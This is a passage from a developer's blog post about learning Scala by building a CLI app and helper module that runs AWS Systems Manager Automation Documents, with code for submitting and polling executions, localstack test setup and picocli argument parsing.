&lt;a href="https://learning.oreilly.com/library/view/scala-for-the/9780134540627/" target="_blank" rel="noopener">&lt;img src="images/scalabook.jpg" alt="Scala-For-The-Impatient">&lt;/a>&lt;/p>
&lt;p>Shortly after starting with the book, I had the idea to start a small project so that I can practice Scala by doing.&lt;/p>
&lt;h2 id="the-idea">The Idea&lt;/h2>
&lt;p>The idea, like many others before, came while fixing a bug at work. The bug was found within a component written in Scala to interact with the AWS Athena service. It had some neatly written functionality for making queries and waiting for their completion before trying to fetch the results. I thought I would try to write something similar for AWS Systems Manager (SSM). It is a service with a few different components, so I decided to focus on &lt;code>Automation Documents&lt;/code> that can carry out actions in an automated fashion. For example, the AWS-provided SSM document &lt;code>AWS-StartEC2Instance&lt;/code> can start an EC2 instance when invoked with the two input parameters below:&lt;/p>
&lt;ul>
&lt;li>&lt;strong>InstanceId&lt;/strong>: to specify which EC2 instance you want to start&lt;/li>
&lt;li>&lt;strong>AutomationAssumeRole&lt;/strong>: to specify an IAM role which can be assumed by SSM to carry out this action&lt;/li>
&lt;/ul>
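&lt;p>For illustration, the parameter structure that SSM Automation expects maps each parameter name to a &lt;em>list&lt;/em> of string values, even when only a single value makes sense. A hypothetical Python sketch (the helper name &lt;code>build_automation_params&lt;/code> is made up for this example):&lt;/p>

```python
# Hypothetical helper showing the shape of the Parameters map that an
# SSM StartAutomationExecution request expects: name -> list of strings.
def build_automation_params(instance_id: str, assume_role_arn: str) -> dict:
    return {
        "InstanceId": [instance_id],
        "AutomationAssumeRole": [assume_role_arn],
    }

params = build_automation_params(
    "i-0123456789abcdef0",
    "arn:aws:iam::123456789012:role/ssm-automation",
)
print(params["InstanceId"])  # ['i-0123456789abcdef0']
```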
&lt;p>I realized quite early on that if I wanted to implement this capability in my Scala app, it needed to be quite generic, so that it could support any Automation Document with an arbitrary number of input parameters. I also wanted it to be able to wait for the execution and report whether it failed or succeeded. Here are the final requirements I came up with:&lt;/p>
&lt;ul>
&lt;li>create 2 separate git repos for:
&lt;ul>
&lt;li>a module that&amp;rsquo;s home for the AWS utility/helper classes&lt;/li>
&lt;li>a module for implementing the CLI App&lt;/li>
&lt;/ul>
&lt;/li>
&lt;li>support extra AWS services such as KMS, Secrets Manager and CloudFormation&lt;/li>
&lt;li>utilize
&lt;a href="https://github.com/localstack/localstack-java-utils" target="_blank" rel="noopener">localstack&lt;/a> for integration testing (when possible)&lt;/li>
&lt;/ul>
&lt;h2 id="initial-setup">Initial setup&lt;/h2>
&lt;p>Firstly, I had to figure out which third-party packages I needed to implement the app according to these simple requirements. To interact with AWS from Scala code, I decided to go with &lt;strong>v2&lt;/strong> of the official
&lt;a href="https://docs.aws.amazon.com/sdk-for-java/index.html" target="_blank" rel="noopener">Java SDK for AWS&lt;/a>. To implement the CLI app I mainly relied on the &lt;strong>picocli&lt;/strong> Java package, which was a bit less straightforward, but eventually it proved to be a good choice.&lt;/p>
&lt;p>Secondly, I have to admit that creating a re-usable Scala package from scratch was a rather non-trivial task for me. Most of my programming experience comes from working in non-JVM-based environments, so that&amp;rsquo;s probably no surprise. I initially started out with &lt;strong>sbt&lt;/strong> for build &amp;amp; dependency management, but I was running into issues that I couldn&amp;rsquo;t solve on my own, so I decided to swap it for &lt;strong>maven&lt;/strong>, which was a bit more familiar to me.&lt;/p>
&lt;p>Finally, separating the project into two distinct git repositories allowed me to practice versioning and dependency management which I also found very useful:&lt;/p>
&lt;ul>
&lt;li>AWS Scala Utils: &lt;a href="https://github.com/florianakos/aws-utils-scala">https://github.com/florianakos/aws-utils-scala&lt;/a>&lt;/li>
&lt;li>AWS SSM CLI App: &lt;a href="https://github.com/florianakos/aws-ssm-scala-app">https://github.com/florianakos/aws-ssm-scala-app&lt;/a>&lt;/li>
&lt;/ul>
&lt;h2 id="the-utils-module">The utils module&lt;/h2>
&lt;p>Creating the utils module that would serve as a kind of glue between the Scala CLI app and AWS Systems Manager was actually not as difficult as I thought. This is mostly thanks to the example I&amp;rsquo;d seen at work for a similar project with the AWS Athena service.&lt;/p>
&lt;p>The core functionality of the utils module when it comes to SSM, is captured in the below functions:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-scala" data-lang="scala">&lt;span class="k">private&lt;/span> &lt;span class="k">def&lt;/span> &lt;span class="n">executeAutomation&lt;/span>&lt;span class="o">(&lt;/span>&lt;span class="n">documentName&lt;/span>&lt;span class="k">:&lt;/span> &lt;span class="kt">String&lt;/span>&lt;span class="o">,&lt;/span> &lt;span class="n">parameters&lt;/span>&lt;span class="k">:&lt;/span> &lt;span class="kt">java.util.Map&lt;/span>&lt;span class="o">[&lt;/span>&lt;span class="kt">String&lt;/span>,&lt;span class="kt">java.util.List&lt;/span>&lt;span class="o">[&lt;/span>&lt;span class="kt">String&lt;/span>&lt;span class="o">]])&lt;/span>&lt;span class="k">:&lt;/span> &lt;span class="kt">Future&lt;/span>&lt;span class="o">[&lt;/span>&lt;span class="kt">String&lt;/span>&lt;span class="o">]&lt;/span> &lt;span class="k">=&lt;/span> &lt;span class="o">{&lt;/span>
&lt;span class="k">val&lt;/span> &lt;span class="n">startAutomationRequest&lt;/span> &lt;span class="k">=&lt;/span> &lt;span class="nc">StartAutomationExecutionRequest&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">builder&lt;/span>&lt;span class="o">()&lt;/span>
&lt;span class="o">.&lt;/span>&lt;span class="n">documentName&lt;/span>&lt;span class="o">(&lt;/span>&lt;span class="n">documentName&lt;/span>&lt;span class="o">)&lt;/span>
&lt;span class="o">.&lt;/span>&lt;span class="n">parameters&lt;/span>&lt;span class="o">(&lt;/span>&lt;span class="n">parameters&lt;/span>&lt;span class="o">)&lt;/span>
&lt;span class="o">.&lt;/span>&lt;span class="n">build&lt;/span>&lt;span class="o">()&lt;/span>
&lt;span class="nc">Future&lt;/span> &lt;span class="o">{&lt;/span>
&lt;span class="k">val&lt;/span> &lt;span class="n">executionResponse&lt;/span> &lt;span class="k">=&lt;/span> &lt;span class="n">ssmClient&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">startAutomationExecution&lt;/span>&lt;span class="o">(&lt;/span>&lt;span class="n">startAutomationRequest&lt;/span>&lt;span class="o">)&lt;/span>
&lt;span class="n">logger&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">info&lt;/span>&lt;span class="o">(&lt;/span>&lt;span class="s">s&amp;#34;Execution id: &lt;/span>&lt;span class="si">${&lt;/span>&lt;span class="n">executionResponse&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">automationExecutionId&lt;/span>&lt;span class="o">()&lt;/span>&lt;span class="si">}&lt;/span>&lt;span class="s">&amp;#34;&lt;/span>&lt;span class="o">)&lt;/span>
&lt;span class="n">executionResponse&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">automationExecutionId&lt;/span>&lt;span class="o">()&lt;/span>
&lt;span class="o">}&lt;/span>
&lt;span class="o">}&lt;/span>
&lt;span class="k">private&lt;/span> &lt;span class="k">def&lt;/span> &lt;span class="n">waitForAutomationToFinish&lt;/span>&lt;span class="o">(&lt;/span>&lt;span class="n">executionId&lt;/span>&lt;span class="k">:&lt;/span> &lt;span class="kt">String&lt;/span>&lt;span class="o">)&lt;/span>&lt;span class="k">:&lt;/span> &lt;span class="kt">Future&lt;/span>&lt;span class="o">[&lt;/span>&lt;span class="kt">String&lt;/span>&lt;span class="o">]&lt;/span> &lt;span class="k">=&lt;/span> &lt;span class="o">{&lt;/span>
&lt;span class="k">val&lt;/span> &lt;span class="n">getExecutionRequest&lt;/span> &lt;span class="k">=&lt;/span> &lt;span class="nc">GetAutomationExecutionRequest&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">builder&lt;/span>&lt;span class="o">().&lt;/span>&lt;span class="n">automationExecutionId&lt;/span>&lt;span class="o">(&lt;/span>&lt;span class="n">executionId&lt;/span>&lt;span class="o">).&lt;/span>&lt;span class="n">build&lt;/span>&lt;span class="o">()&lt;/span>
&lt;span class="k">var&lt;/span> &lt;span class="n">status&lt;/span> &lt;span class="k">=&lt;/span> &lt;span class="nc">AutomationExecutionStatus&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="nc">IN_PROGRESS&lt;/span>
&lt;span class="nc">Future&lt;/span> &lt;span class="o">{&lt;/span>
&lt;span class="k">var&lt;/span> &lt;span class="n">retries&lt;/span> &lt;span class="k">=&lt;/span> &lt;span class="mi">0&lt;/span>
&lt;span class="k">while&lt;/span> &lt;span class="o">(&lt;/span>&lt;span class="n">status&lt;/span> &lt;span class="o">!=&lt;/span> &lt;span class="nc">AutomationExecutionStatus&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="nc">SUCCESS&lt;/span>&lt;span class="o">)&lt;/span> &lt;span class="o">{&lt;/span>
&lt;span class="k">val&lt;/span> &lt;span class="n">automationExecutionResponse&lt;/span> &lt;span class="k">=&lt;/span> &lt;span class="n">ssmClient&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">getAutomationExecution&lt;/span>&lt;span class="o">(&lt;/span>&lt;span class="n">getExecutionRequest&lt;/span>&lt;span class="o">)&lt;/span>
&lt;span class="n">status&lt;/span> &lt;span class="k">=&lt;/span> &lt;span class="n">automationExecutionResponse&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">automationExecution&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">automationExecutionStatus&lt;/span>&lt;span class="o">()&lt;/span>
&lt;span class="n">status&lt;/span> &lt;span class="k">match&lt;/span> &lt;span class="o">{&lt;/span>
&lt;span class="k">case&lt;/span> &lt;span class="nc">AutomationExecutionStatus&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="nc">CANCELLED&lt;/span> &lt;span class="o">|&lt;/span> &lt;span class="nc">AutomationExecutionStatus&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="nc">FAILED&lt;/span> &lt;span class="o">|&lt;/span> &lt;span class="nc">AutomationExecutionStatus&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="nc">TIMED_OUT&lt;/span> &lt;span class="k">=&amp;gt;&lt;/span>
&lt;span class="k">throw&lt;/span> &lt;span class="nc">SsmAutomationExecutionException&lt;/span>&lt;span class="o">(&lt;/span>&lt;span class="n">status&lt;/span>&lt;span class="o">,&lt;/span> &lt;span class="n">automationExecutionResponse&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">automationExecution&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">failureMessage&lt;/span>&lt;span class="o">)&lt;/span>
&lt;span class="k">case&lt;/span> &lt;span class="nc">AutomationExecutionStatus&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="nc">SUCCESS&lt;/span> &lt;span class="k">=&amp;gt;&lt;/span>
&lt;span class="n">logger&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">info&lt;/span>&lt;span class="o">(&lt;/span>&lt;span class="s">s&amp;#34;Query finished with status: &lt;/span>&lt;span class="si">$status&lt;/span>&lt;span class="s">&amp;#34;&lt;/span>&lt;span class="o">)&lt;/span>
&lt;span class="k">case&lt;/span> &lt;span class="n">status&lt;/span>&lt;span class="k">:&lt;/span> &lt;span class="kt">AutomationExecutionStatus&lt;/span> &lt;span class="o">=&amp;gt;&lt;/span>
&lt;span class="n">logger&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">info&lt;/span>&lt;span class="o">(&lt;/span>&lt;span class="s">s&amp;#34;SSM Automation execution status: &lt;/span>&lt;span class="si">$status&lt;/span>&lt;span class="s">, check #&lt;/span>&lt;span class="si">$retries&lt;/span>&lt;span class="s">.&amp;#34;&lt;/span>&lt;span class="o">)&lt;/span>
&lt;span class="nc">Thread&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">sleep&lt;/span>&lt;span class="o">(&lt;/span>&lt;span class="k">if&lt;/span> &lt;span class="o">(&lt;/span>&lt;span class="n">retries&lt;/span> &lt;span class="o">&amp;lt;=&lt;/span> &lt;span class="mi">3&lt;/span>&lt;span class="o">)&lt;/span> &lt;span class="mi">2500&lt;/span> &lt;span class="k">else&lt;/span> &lt;span class="k">if&lt;/span> &lt;span class="o">(&lt;/span>&lt;span class="n">retries&lt;/span> &lt;span class="o">&amp;lt;=&lt;/span> &lt;span class="mi">10&lt;/span>&lt;span class="o">)&lt;/span> &lt;span class="mi">5000&lt;/span> &lt;span class="k">else&lt;/span> &lt;span class="mi">15000&lt;/span>&lt;span class="o">)&lt;/span>
&lt;span class="o">}&lt;/span>
&lt;span class="n">retries&lt;/span> &lt;span class="o">+=&lt;/span> &lt;span class="mi">1&lt;/span>
&lt;span class="o">}&lt;/span>
&lt;span class="o">}.&lt;/span>&lt;span class="n">map&lt;/span>&lt;span class="o">(&lt;/span>&lt;span class="k">_&lt;/span> &lt;span class="k">=&amp;gt;&lt;/span> &lt;span class="n">executionId&lt;/span>&lt;span class="o">)&lt;/span>
&lt;span class="o">}&lt;/span>
&lt;/code>&lt;/pre>&lt;/div>&lt;p>The first one &lt;code>executeAutomation&lt;/code> crafts an execution request and then submits it to AWS, returning its execution ID. This ID can be passed to the &lt;code>waitForAutomationToFinish&lt;/code> function that periodically checks in with AWS until the execution is complete. Between subsequent API requests it uses an increasing timeout to prevent API rate-limiting caused by excessive polling.&lt;/p>
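&lt;p>The stepped back-off schedule inside &lt;code>waitForAutomationToFinish&lt;/code> can be isolated as a small pure function; here is a Python sketch of the same logic for clarity: quick checks for the first few retries, then progressively longer waits:&lt;/p>

```python
def poll_delay_ms(retries: int) -> int:
    # Mirrors the sleep schedule in waitForAutomationToFinish:
    # 2.5 s for the first few checks, 5 s up to ten, then 15 s.
    if retries <= 3:
        return 2500
    elif retries <= 10:
        return 5000
    return 15000

print([poll_delay_ms(r) for r in (0, 4, 11)])  # [2500, 5000, 15000]
```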
&lt;h2 id="testing-the-utils-module">Testing the utils module&lt;/h2>
&lt;p>Once I had the core functionality ready, I wanted to write integration tests to ensure it worked as expected. Instead of hard-coding AWS credentials or using an AWS profile for a real account, I wanted to use Localstack, which mocks the real AWS API so that you can interact with it. For this reason I slightly tweaked the &lt;code>SsmAutomationHelper&lt;/code> class to accept an &lt;strong>Optional&lt;/strong> second argument which can be used while building the SSM API client:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-scala" data-lang="scala">&lt;span class="k">class&lt;/span> &lt;span class="nc">SsmAutomationHelper&lt;/span>&lt;span class="o">(&lt;/span>&lt;span class="n">profile&lt;/span>&lt;span class="k">:&lt;/span> &lt;span class="kt">String&lt;/span>&lt;span class="o">,&lt;/span> &lt;span class="n">apiEndpoint&lt;/span>&lt;span class="k">:&lt;/span> &lt;span class="kt">Option&lt;/span>&lt;span class="o">[&lt;/span>&lt;span class="kt">String&lt;/span>&lt;span class="o">])&lt;/span> &lt;span class="k">extends&lt;/span> &lt;span class="nc">LazyLogging&lt;/span> &lt;span class="o">{&lt;/span>
&lt;span class="k">private&lt;/span> &lt;span class="k">val&lt;/span> &lt;span class="n">ssmClient&lt;/span> &lt;span class="k">=&lt;/span> &lt;span class="n">apiEndpoint&lt;/span> &lt;span class="k">match&lt;/span> &lt;span class="o">{&lt;/span>
&lt;span class="k">case&lt;/span> &lt;span class="nc">None&lt;/span> &lt;span class="k">=&amp;gt;&lt;/span> &lt;span class="nc">SsmClient&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">builder&lt;/span>&lt;span class="o">()&lt;/span>
&lt;span class="o">.&lt;/span>&lt;span class="n">credentialsProvider&lt;/span>&lt;span class="o">(&lt;/span>&lt;span class="nc">ProfileCredentialsProvider&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">create&lt;/span>&lt;span class="o">(&lt;/span>&lt;span class="n">profile&lt;/span>&lt;span class="o">))&lt;/span>
&lt;span class="o">.&lt;/span>&lt;span class="n">region&lt;/span>&lt;span class="o">(&lt;/span>&lt;span class="nc">Region&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="nc">EU_WEST_1&lt;/span>&lt;span class="o">)&lt;/span>
&lt;span class="o">.&lt;/span>&lt;span class="n">build&lt;/span>&lt;span class="o">()&lt;/span>
&lt;span class="k">case&lt;/span> &lt;span class="nc">Some&lt;/span>&lt;span class="o">(&lt;/span>&lt;span class="n">localstackEndpoint&lt;/span>&lt;span class="o">)&lt;/span> &lt;span class="k">=&amp;gt;&lt;/span> &lt;span class="nc">SsmClient&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">builder&lt;/span>&lt;span class="o">()&lt;/span>
&lt;span class="o">.&lt;/span>&lt;span class="n">credentialsProvider&lt;/span>&lt;span class="o">(&lt;/span>&lt;span class="nc">StaticCredentialsProvider&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">create&lt;/span>&lt;span class="o">(&lt;/span>&lt;span class="nc">AwsBasicCredentials&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">create&lt;/span>&lt;span class="o">(&lt;/span>&lt;span class="s">&amp;#34;foo&amp;#34;&lt;/span>&lt;span class="o">,&lt;/span> &lt;span class="s">&amp;#34;bar&amp;#34;&lt;/span>&lt;span class="o">)))&lt;/span>
&lt;span class="o">.&lt;/span>&lt;span class="n">endpointOverride&lt;/span>&lt;span class="o">(&lt;/span>&lt;span class="nc">URI&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">create&lt;/span>&lt;span class="o">(&lt;/span>&lt;span class="n">localstackEndpoint&lt;/span>&lt;span class="o">))&lt;/span>
&lt;span class="o">.&lt;/span>&lt;span class="n">build&lt;/span>&lt;span class="o">()&lt;/span>
&lt;span class="o">}&lt;/span>
&lt;span class="o">}&lt;/span>
&lt;/code>&lt;/pre>&lt;/div>&lt;p>This allowed me to pass &lt;code>http://localhost:4566&lt;/code> when running the integration tests against &lt;strong>localstack&lt;/strong> and have the API calls directed to those mocked endpoints. Previously each mocked service had its own dedicated port, but thanks to a recent change in &lt;strong>localstack&lt;/strong>, all AWS services can now be served on a single port, which they call the &lt;strong>EDGE&lt;/strong> port.&lt;/p>
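&lt;p>With this change, test and production setups differ only in the second constructor argument. A sketch (the profile name is illustrative; localstack ignores the dummy static credentials the class supplies):&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-scala" data-lang="scala">// Production: credentials resolved from a real AWS profile
val prodHelper = new SsmAutomationHelper(&amp;#34;my-aws-profile&amp;#34;, None)

// Integration tests: all API calls routed to the localstack EDGE port
val testHelper = new SsmAutomationHelper(&amp;#34;unused&amp;#34;, Some(&amp;#34;http://localhost:4566&amp;#34;))
&lt;/code>&lt;/pre>&lt;/div>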
&lt;p>According to the documentation, SSM is supported in &lt;strong>localstack&lt;/strong>; however, I found out that running Automation Documents is a feature that is still missing. As a result, I had to run the integration tests against a real AWS account that I set up for such scenarios. I was okay with doing this since there are plenty of built-in Automation Documents provided by AWS that I could safely use for this purpose.&lt;/p>
&lt;p>Eventually I decided to use &lt;code>AWS-StartEC2Instance&lt;/code> and &lt;code>AWS-StopEC2Instance&lt;/code> in the tests, which only required setting up a dummy EC2 instance to be the target of these requests. I also added a special &lt;strong>Tag&lt;/strong> to these integration tests so that they are excluded when invoked via &lt;code>mvn test&lt;/code> but can still be run manually whenever necessary.&lt;/p>
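&lt;p>In ScalaTest, this kind of exclusion can be done with a custom tag object. A sketch (the tag and suite names are illustrative, and the Maven/ScalaTest configuration must be set to exclude the tag from the default &lt;code>mvn test&lt;/code> run):&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-scala" data-lang="scala">import org.scalatest.Tag
import org.scalatest.funsuite.AnyFunSuite

// Marker for tests that talk to a real AWS account
object AwsIntegrationTest extends Tag(&amp;#34;com.flrnks.AwsIntegrationTest&amp;#34;)

class SsmAutomationHelperIntegrationSpec extends AnyFunSuite {
  test(&amp;#34;AWS-StartEC2Instance starts the dummy instance&amp;#34;, AwsIntegrationTest) {
    // ... exercise SsmAutomationHelper against the real account here ...
  }
}
&lt;/code>&lt;/pre>&lt;/div>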
&lt;h2 id="cli-app-implementation">CLI App implementation&lt;/h2>
&lt;p>After running the tests, I was confident that the AWS utils worked correctly, so I started putting together the CLI app. I searched the web for a third-party argument-parsing package and found that it&amp;rsquo;s not as simple as with Python&amp;rsquo;s &lt;code>argparse&lt;/code> package. I eventually settled on &lt;code>picocli&lt;/code>, which is written in Java but can also be used from Scala via the annotations below:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-scala" data-lang="scala">&lt;span class="nd">@Command&lt;/span>&lt;span class="o">(&lt;/span>&lt;span class="n">name&lt;/span> &lt;span class="k">=&lt;/span> &lt;span class="s">&amp;#34;SsmHelper&amp;#34;&lt;/span>&lt;span class="o">,&lt;/span> &lt;span class="n">version&lt;/span> &lt;span class="k">=&lt;/span> &lt;span class="nc">Array&lt;/span>&lt;span class="o">(&lt;/span>&lt;span class="s">&amp;#34;v0.0.1&amp;#34;&lt;/span>&lt;span class="o">),&lt;/span> &lt;span class="n">mixinStandardHelpOptions&lt;/span> &lt;span class="k">=&lt;/span> &lt;span class="kc">true&lt;/span>&lt;span class="o">,&lt;/span> &lt;span class="n">description&lt;/span> &lt;span class="k">=&lt;/span> &lt;span class="nc">Array&lt;/span>&lt;span class="o">(&lt;/span>&lt;span class="s">&amp;#34;CLI app for running automation documents in AWS SSM&amp;#34;&lt;/span>&lt;span class="o">))&lt;/span>
&lt;span class="k">class&lt;/span> &lt;span class="nc">SsmCliParser&lt;/span> &lt;span class="k">extends&lt;/span> &lt;span class="nc">Callable&lt;/span>&lt;span class="o">[&lt;/span>&lt;span class="kt">Unit&lt;/span>&lt;span class="o">]&lt;/span> &lt;span class="k">with&lt;/span> &lt;span class="nc">LazyLogging&lt;/span> &lt;span class="o">{&lt;/span>
&lt;span class="nd">@Option&lt;/span>&lt;span class="o">(&lt;/span>&lt;span class="n">names&lt;/span> &lt;span class="k">=&lt;/span> &lt;span class="nc">Array&lt;/span>&lt;span class="o">(&lt;/span>&lt;span class="s">&amp;#34;-D&amp;#34;&lt;/span>&lt;span class="o">,&lt;/span> &lt;span class="s">&amp;#34;--document&amp;#34;&lt;/span>&lt;span class="o">),&lt;/span> &lt;span class="n">description&lt;/span> &lt;span class="k">=&lt;/span> &lt;span class="nc">Array&lt;/span>&lt;span class="o">(&lt;/span>&lt;span class="s">&amp;#34;Name of the SSM Automation document to execute&amp;#34;&lt;/span>&lt;span class="o">))&lt;/span>
&lt;span class="k">private&lt;/span> &lt;span class="k">var&lt;/span> &lt;span class="n">documentName&lt;/span> &lt;span class="k">=&lt;/span> &lt;span class="k">new&lt;/span> &lt;span class="nc">String&lt;/span>
&lt;span class="nd">@Parameters&lt;/span>&lt;span class="o">(&lt;/span>&lt;span class="n">index&lt;/span> &lt;span class="k">=&lt;/span> &lt;span class="s">&amp;#34;0..*&amp;#34;&lt;/span>&lt;span class="o">,&lt;/span> &lt;span class="n">arity&lt;/span> &lt;span class="k">=&lt;/span> &lt;span class="s">&amp;#34;0..*&amp;#34;&lt;/span>&lt;span class="o">,&lt;/span> &lt;span class="n">paramLabel&lt;/span> &lt;span class="k">=&lt;/span> &lt;span class="s">&amp;#34;&amp;lt;param1=val1&amp;gt; &amp;lt;param2=val2&amp;gt; ...&amp;#34;&lt;/span>&lt;span class="o">,&lt;/span> &lt;span class="n">description&lt;/span> &lt;span class="k">=&lt;/span> &lt;span class="nc">Array&lt;/span>&lt;span class="o">(&lt;/span>&lt;span class="s">&amp;#34;Key=Value parameters to use as Input Params&amp;#34;&lt;/span>&lt;span class="o">))&lt;/span>
&lt;span class="k">private&lt;/span> &lt;span class="k">val&lt;/span> &lt;span class="n">parameters&lt;/span>&lt;span class="k">:&lt;/span> &lt;span class="kt">util.ArrayList&lt;/span>&lt;span class="o">[&lt;/span>&lt;span class="kt">String&lt;/span>&lt;span class="o">]&lt;/span> &lt;span class="k">=&lt;/span> &lt;span class="kc">null&lt;/span>
&lt;span class="o">[&lt;/span>&lt;span class="kt">...&lt;/span>&lt;span class="o">]&lt;/span>
&lt;/code>&lt;/pre>&lt;/div>&lt;p>The original idea called for one constant CLI flag to control the name of the AWS Automation Document (&lt;code>--document&lt;/code>), plus a variable number of additional arguments for specifying the Input Parameters required by the given document. The &lt;code>picocli&lt;/code> package supports this workflow via the &lt;strong>@Option&lt;/strong> and &lt;strong>@Parameters&lt;/strong> annotations.&lt;/p>
&lt;p>The only thing left was a custom function to carry out the needed transformation of the Input Parameters. The values received in &lt;code>parameters&lt;/code> came in the form of an &lt;strong>ArrayList&lt;/strong>: &lt;code>[&amp;lt;param1=val1&amp;gt;, &amp;lt;param2=val2&amp;gt;, ...]&lt;/code>, which had to be transformed into a &lt;strong>Map&lt;/strong>: &lt;code>[param1 -&amp;gt; [val1], param2 -&amp;gt; [val2]]&lt;/code> by splitting each String on the &lt;strong>=&lt;/strong> character; this format is required by the AWS SDK for SSM. After some iterations I ended up with the function below:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-scala" data-lang="scala">&lt;span class="k">private&lt;/span> &lt;span class="k">def&lt;/span> &lt;span class="n">process&lt;/span>&lt;span class="o">(&lt;/span>&lt;span class="n">params&lt;/span>&lt;span class="k">:&lt;/span> &lt;span class="kt">util.ArrayList&lt;/span>&lt;span class="o">[&lt;/span>&lt;span class="kt">String&lt;/span>&lt;span class="o">])&lt;/span>&lt;span class="k">:&lt;/span> &lt;span class="kt">util.Map&lt;/span>&lt;span class="o">[&lt;/span>&lt;span class="kt">String&lt;/span>, &lt;span class="kt">util.List&lt;/span>&lt;span class="o">[&lt;/span>&lt;span class="kt">String&lt;/span>&lt;span class="o">]]&lt;/span> &lt;span class="k">=&lt;/span> &lt;span class="o">{&lt;/span>
&lt;span class="n">params&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">asScala&lt;/span>
&lt;span class="o">.&lt;/span>&lt;span class="n">map&lt;/span>&lt;span class="o">(&lt;/span>&lt;span class="k">_&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">split&lt;/span>&lt;span class="o">(&lt;/span>&lt;span class="sc">&amp;#39;=&amp;#39;&lt;/span>&lt;span class="o">))&lt;/span>
&lt;span class="o">.&lt;/span>&lt;span class="n">collect&lt;/span> &lt;span class="o">{&lt;/span> &lt;span class="k">case&lt;/span> &lt;span class="nc">Array&lt;/span>&lt;span class="o">(&lt;/span>&lt;span class="n">key&lt;/span>&lt;span class="o">,&lt;/span> &lt;span class="n">value&lt;/span>&lt;span class="o">)&lt;/span> &lt;span class="k">=&amp;gt;&lt;/span> &lt;span class="n">key&lt;/span> &lt;span class="o">-&amp;gt;&lt;/span> &lt;span class="n">value&lt;/span> &lt;span class="o">}&lt;/span>
&lt;span class="o">.&lt;/span>&lt;span class="n">groupBy&lt;/span>&lt;span class="o">(&lt;/span>&lt;span class="k">_&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">_1&lt;/span>&lt;span class="o">)&lt;/span>
&lt;span class="o">.&lt;/span>&lt;span class="n">mapValues&lt;/span>&lt;span class="o">(&lt;/span>&lt;span class="k">_&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">map&lt;/span>&lt;span class="o">(&lt;/span>&lt;span class="k">_&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">_2&lt;/span>&lt;span class="o">).&lt;/span>&lt;span class="n">asJava&lt;/span>&lt;span class="o">).&lt;/span>&lt;span class="n">asJava&lt;/span>
&lt;span class="o">}&lt;/span>
&lt;/code>&lt;/pre>&lt;/div>&lt;p>Finally, I constructed the below method which utilized the &lt;code>SsmAutomationHelper&lt;/code> class from the utils module and passed the two variables provided by &lt;code>picocli&lt;/code> to it so it would invoke the necessary Automation Document and wait to retrieve its result via the &lt;code>Await&lt;/code> mechanism of Scala:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-scala" data-lang="scala">&lt;span class="k">def&lt;/span> &lt;span class="n">call&lt;/span>&lt;span class="o">()&lt;/span>&lt;span class="k">:&lt;/span> &lt;span class="kt">Unit&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="o">{&lt;/span>
&lt;span class="k">val&lt;/span> &lt;span class="n">conf&lt;/span> &lt;span class="k">=&lt;/span> &lt;span class="nc">ConfigFactory&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">load&lt;/span>&lt;span class="o">()&lt;/span>
&lt;span class="k">val&lt;/span> &lt;span class="n">inputParams&lt;/span> &lt;span class="k">=&lt;/span> &lt;span class="n">process&lt;/span>&lt;span class="o">(&lt;/span>&lt;span class="n">parameters&lt;/span>&lt;span class="o">)&lt;/span>
&lt;span class="nc">Await&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">result&lt;/span>&lt;span class="o">(&lt;/span>&lt;span class="nc">SsmAutomationHelper&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">newInstance&lt;/span>&lt;span class="o">(&lt;/span>&lt;span class="n">conf&lt;/span>&lt;span class="o">).&lt;/span>&lt;span class="n">runDocumentWithParameters&lt;/span>&lt;span class="o">(&lt;/span>&lt;span class="n">documentName&lt;/span>&lt;span class="o">,&lt;/span> &lt;span class="n">inputParams&lt;/span>&lt;span class="o">),&lt;/span> &lt;span class="mf">10.&lt;/span>&lt;span class="n">minutes&lt;/span>&lt;span class="o">)&lt;/span>
&lt;span class="o">}&lt;/span>
&lt;/code>&lt;/pre>&lt;/div>&lt;h2 id="packaging-the-cli-app">Packaging the CLI app&lt;/h2>
